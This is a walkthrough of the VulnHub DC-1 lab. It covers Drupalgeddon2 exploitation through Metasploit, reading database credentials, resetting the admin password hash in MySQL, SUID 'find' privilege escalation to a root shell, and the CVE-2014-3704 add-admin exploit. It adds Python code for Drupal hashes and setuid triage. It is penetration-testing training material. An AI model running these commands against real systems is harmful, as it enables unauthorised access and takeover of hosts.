DC1
Download:
https://download.vulnhub.com/dc/DC-1.zip
Challenge description:
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
Information gathering
1.1 arp-scan -l (locate the target on the local segment)
1.2 ifconfig (confirm our own address)
1.3 nmap -p- -sV 192.168.126.130 (all TCP ports, with service versions)
rpcbind found
The rpcbind service on port 111 can be abused for UDP reflection DDoS; it is not the way in here, so note it and move on.
1.4 whatweb http://192.168.126.130 (fingerprint the web application)
Exploitation
2.1 Drupal 7 identified
2.2 Start msfconsole
2.3 search drupal
2.4 Try exploit/unix/webapp/drupal_drupalgeddon2, the Drupalgeddon2 remote code execution module (CVE-2018-7600)
use 1 (the index from the search output; use exploit/unix/webapp/drupal_drupalgeddon2 works regardless of the index)
show options
set rhost 192.168.126.130
run
Shell obtained (a meterpreter session)
sysinfo
(help lists the available meterpreter commands)
ls
2.5 flag1.txt found in the web root
cat flag1.txt
Database
3.1 flag1 hints that the Drupal site's config file is worth a look (for Drupal 7 that is sites/default/settings.php under the web root)
3.2 It holds the database credentials
3.3 Drop from meterpreter to a shell on the host:
shell
Then upgrade it to a fully interactive TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
or
script /dev/null
3.4 mysql -udbuser -p
R0ck3t (the password from settings.php)
show databases;
use drupaldb;
show tables;
select * from users;
(exit leaves the mysql client)
3.5 The pass column holds $S$... values. These are Drupal 7's salted, iterated SHA-512 hashes (2^15 rounds), not plain salted MD5: hashcat mode 7900 can attack them, but the round count makes cracking slow for a lab, so we take another route.
3.6 Reset the password instead
find / -name "password-hash.sh"
php /var/www/scripts/password-hash.sh 123
Copy the salted hash it prints, e.g.:
$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT
Back in mysql:
update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;
(password-hash.sh picks a fresh random salt on every run, so the value in the UPDATE must be the one you just generated; the two hashes above come from different runs, both for the password 123)
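The reset above depends on producing a hash in exactly the format Drupal 7 stores. The following is an added example, not code from the walkthrough or from Drupal itself: a Python port of the $S$ scheme from Drupal 7's includes/password.inc (SHA-512, 2^count_log2 rounds, Drupal's own non-standard base64 alphabet, result truncated to 55 characters). It lets you generate the hash without a PHP shell on the target, decode the round count and salt of a stored hash, verify that a pasted hash really matches the password you intend to use, and build the UPDATE statement. Function names are mine; the constants mirror Drupal's.

```python
import hashlib
import hmac
import os

# Constants from Drupal 7's includes/password.inc
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are truncated to this
DEFAULT_COUNT_LOG2 = 15     # DRUPAL_HASH_COUNT: 2**15 = 32768 SHA-512 rounds
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30


def _b64(data):
    """Drupal's _password_base64_encode(): 6-bit groups packed little-endian,
    itoa64 alphabet, no padding. This is NOT standard base64."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _crypt(password, setting):
    """Port of _password_crypt('sha512', ...). setting = '$S$' + log2(rounds) + 8-char salt."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$" or setting[3] not in ITOA64:
        return None
    count_log2 = ITOA64.index(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return None
    salt = setting[4:12].encode()
    digest = hashlib.sha512(salt + password).digest()
    for _ in range(1 << count_log2):            # PHP: do { ... } while (--$count)
        digest = hashlib.sha512(digest + password).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def hash_password(password, count_log2=DEFAULT_COUNT_LOG2):
    """What password-hash.sh prints: a fresh 6-byte random salt, then the iterated hash."""
    count_log2 = max(MIN_COUNT_LOG2, min(MAX_COUNT_LOG2, count_log2))
    setting = "$S$" + ITOA64[count_log2] + _b64(os.urandom(6))
    return _crypt(password.encode(), setting)


def check_password(password, stored):
    """Port of user_check_password() for $S$ hashes (legacy 'U$' md5-migrated hashes not handled)."""
    if not stored.startswith("$S$"):
        return False
    computed = _crypt(password.encode(), stored)
    return computed is not None and hmac.compare_digest(computed, stored)


def parse_setting(stored):
    """Decode the header of a stored hash: how many rounds and which salt it used."""
    count_log2 = ITOA64.index(stored[3])
    return {"count_log2": count_log2, "rounds": 1 << count_log2, "salt": stored[4:12]}


def reset_sql(uid, password):
    """The UPDATE from the walkthrough, built from a locally generated hash.
    The itoa64 alphabet contains no quotes, so the hash can be inlined safely."""
    return "UPDATE users SET pass = '%s' WHERE uid = %d;" % (hash_password(password), int(uid))
```

Before pasting a hash into the UPDATE, run check_password("123", hash) on it: if it returns False you have copied the wrong run's output. parse_setting on the hash shown above reports 32768 rounds and the salt Rg21kugC, which is also why offline cracking of the users table is slow.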
Admin backend
4.1 Log in to the Drupal backend as the uid=1 account (admin) with the new password 123
4.2 Open Content in the top-left admin menu; flag3 is one of the nodes listed there
4.3 Follow flag3's hint about passwd and shadow
cat /etc/passwd (shows a user flag4 whose home directory is /home/flag4)
cat /home/flag4/flag4.txt
4.4 flag4 found
Privilege escalation
5.1 flag4 hints at the escalation route
Linux privilege escalation via SUID binaries
5.2 List binaries with the setuid bit set
find / -perm -u=s -type f 2>/dev/null
find itself is setuid root
5.3 Escalate through find
find /usr/bin/find -exec "/bin/sh" \;
(-exec runs /bin/sh under find's effective uid 0; Debian's /bin/sh is dash, which keeps the elevated euid, whereas bash would need -p to avoid dropping it)
cd /root
cat thefinalflag.txt
5.4 Final flag found
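The find one-liner lists every setuid file, but on a real host most entries are expected (passwd, su, sudo, mount) and the interesting ones are the few that can spawn a shell, like find on DC-1. Added example, not from the walkthrough: a Python equivalent of find -perm -u=s -type f that triages each hit against a baseline and a shell-capable list, plus the hardening step of clearing the bit. The two name lists are assumptions (a typical Debian baseline and a subset of well-known shell-capable binaries), and demo() runs everything against a constructed temporary tree, not the DC-1 filesystem.

```python
import os
import shutil
import stat
import tempfile

# Assumption: setuid binaries that normally ship on a stock Debian install.
SUID_BASELINE = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                 "gpasswd", "newgrp", "ping", "ping6", "pkexec", "fusermount"}
# Assumption: setuid binaries that hand out a root shell via an -exec/! style escape.
SUID_SHELL_CAPABLE = {"find", "vim", "vi", "nmap", "bash", "sh", "python", "python2",
                      "python3", "perl", "awk", "less", "more", "nano", "cp", "mv", "env"}


def list_setuid(root):
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with S_ISUID set.
    Unreadable directories are skipped, like the 2>/dev/null in the walkthrough."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def triage_setuid(root):
    """Map each setuid file to 'baseline' (expected), 'DANGEROUS' (shell-capable,
    like find on DC-1) or 'review' (unknown: inspect by hand)."""
    verdicts = {}
    for path in list_setuid(root):
        name = os.path.basename(path)
        if name in SUID_BASELINE:
            verdicts[path] = "baseline"
        elif name in SUID_SHELL_CAPABLE:
            verdicts[path] = "DANGEROUS"
        else:
            verdicts[path] = "review"
    return verdicts


def drop_setuid(path):
    """Hardening step (chmod u-s): clear the setuid bit and return the new permission bits."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~stat.S_ISUID)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Build a constructed fake tree (not the DC-1 box), triage it, then fix find."""
    root = tempfile.mkdtemp()
    try:
        layout = {"usr/bin/find": 0o4755, "usr/bin/passwd": 0o4755, "bin/ping": 0o4755,
                  "usr/local/bin/backup": 0o4755,
                  "bin/ls": 0o755}                 # not setuid: must not be listed
        for rel, mode in layout.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb"):
                pass
            os.chmod(path, mode)
        verdicts = {os.path.relpath(p, root): v for p, v in triage_setuid(root).items()}
        fixed_mode = drop_setuid(os.path.join(root, "usr/bin/find"))
        remaining = {os.path.relpath(p, root) for p in list_setuid(root)}
        return verdicts, fixed_mode, remaining
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

On a live box run triage_setuid("/") as the low-privileged user: anything marked DANGEROUS is the escalation path the walkthrough takes, and anything marked review is what an admin should explain before the attacker does.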
Alternative route: Drupalgeddon SQL injection
6.1 CVE-2014-3704 - Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
6.2 searchsploit Drupal
Drupal 7 has an SQL injection that can be used to add an admin user
6.3 Locate the exploit
locate php/webapps/34992.py
6.4 Copy it to the working directory
cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./
6.5 Read the usage
cat 34992.py
(the script takes the target URL and the username and password of the admin account it creates; this replaces steps 3.4-3.6 entirely, since no shell or database access is needed first)